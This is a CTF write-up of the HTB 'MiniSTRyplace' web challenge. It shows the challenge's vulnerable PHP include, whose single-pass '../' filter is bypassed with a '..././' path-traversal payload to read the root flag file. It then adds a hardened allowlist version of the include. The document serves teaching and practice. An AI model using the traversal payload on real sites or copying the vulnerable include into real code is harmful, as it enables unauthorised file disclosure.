HTB Cyber Apocalypse CTF 2021: MiniSTRyplace

MiniSTRyplace is a web-based challenge with a difficulty of one star.

Let’s start by reading the source code from the folder provided.

Wait, what?! A flag file? Well, it's fake:

CHTB{f4k3_fl4g_f0r_t3st1ng}

In the challenge directory, I found the ‘index.php’ file:

<html>
<header>
  <meta name='author' content='bertolis, makelaris'>
  <title>Ministry of Defence</title>
  <link rel="stylesheet" href="/static/css/main.css">
  <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootswatch/4.5.0/slate/bootstrap.min.css">
</header>
<body>
  <div class="language">
    <a href="?lang=en.php">EN</a>
    <a href="?lang=qw.php">QW</a>
  </div>
<?php
$lang = ['en.php', 'qw.php'];
// str_replace() strips '../' in a single pass; the result goes straight into include()
include('pages/' . (isset($_GET['lang']) ? str_replace('../', '', $_GET['lang']) : $lang[array_rand($lang)]));
?>
</body>
</html>

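The input is sanitized: we cannot use “../” to go up a directory, because the program removes it. However, str_replace() makes a single pass over the input and does not re-check its own output, so we can bypass the sanitization:

Input: ..././
Output: ../

Removing the inner “../” leaves the surrounding characters to join into a new “../”, so we can bypass the sanitization and go up a directory.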

The Dockerfile specifies that the flag file is in the root directory.

Let’s GET the flag:

?lang=..././..././..././..././flag
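
The same include hardened, as an added example (not part of the original writeup or the challenge source): the lang parameter is matched against an allowlist and the resolved path is checked to stay under pages/, printed next to what the single-pass filter returns for the input shown above. The helper name resolve_lang_page() and the temporary demo directory are assumptions made for the example.

```php
<?php
// Added example, not the challenge's code. resolve_lang_page() is a hypothetical helper.
const ALLOWED_LANGS = ['en.php', 'qw.php'];   // the two pages index.php links to

function resolve_lang_page(?string $requested, string $pagesDir): string
{
    // 1. Allowlist: the parameter only selects among known file names.
    if ($requested === null || !in_array($requested, ALLOWED_LANGS, true)) {
        $requested = ALLOWED_LANGS[0];        // fixed default instead of filtering
    }
    // 2. Defence in depth: canonicalise, then confirm the file is inside pages/.
    $base = realpath($pagesDir);
    if ($base === false) {
        throw new RuntimeException('pages directory missing');
    }
    $path = realpath($base . DIRECTORY_SEPARATOR . $requested);
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($path === false || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        throw new RuntimeException('language page not found');
    }
    return $path;
}

// Constructed demo tree so the script runs offline.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'ministry_demo_' . bin2hex(random_bytes(4));
mkdir($root . '/pages', 0700, true);
file_put_contents($root . '/pages/en.php', 'EN page');
file_put_contents($root . '/pages/qw.php', 'QW page');

// Constructed inputs: a legitimate value and the writeup's filter-bypass value.
foreach (['qw.php', '..././'] as $input) {
    $filtered = str_replace('../', '', $input);            // index.php's filter
    $page = resolve_lang_page($input, $root . '/pages');   // hardened lookup
    printf("input=%-8s single-pass filter=%-8s hardened include=%s\n",
        $input, $filtered, basename($page));
}
```

Because the request value is only compared against the allowlist and never concatenated into the path unless it matches exactly, there is nothing left for a string filter to get wrong.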

Thank you :) — Mudhalai Mr Team 1nf1n1ty

<>AKA Gowtham Student at SASTRA Deemed university, Core team member DSC SASTRA </>
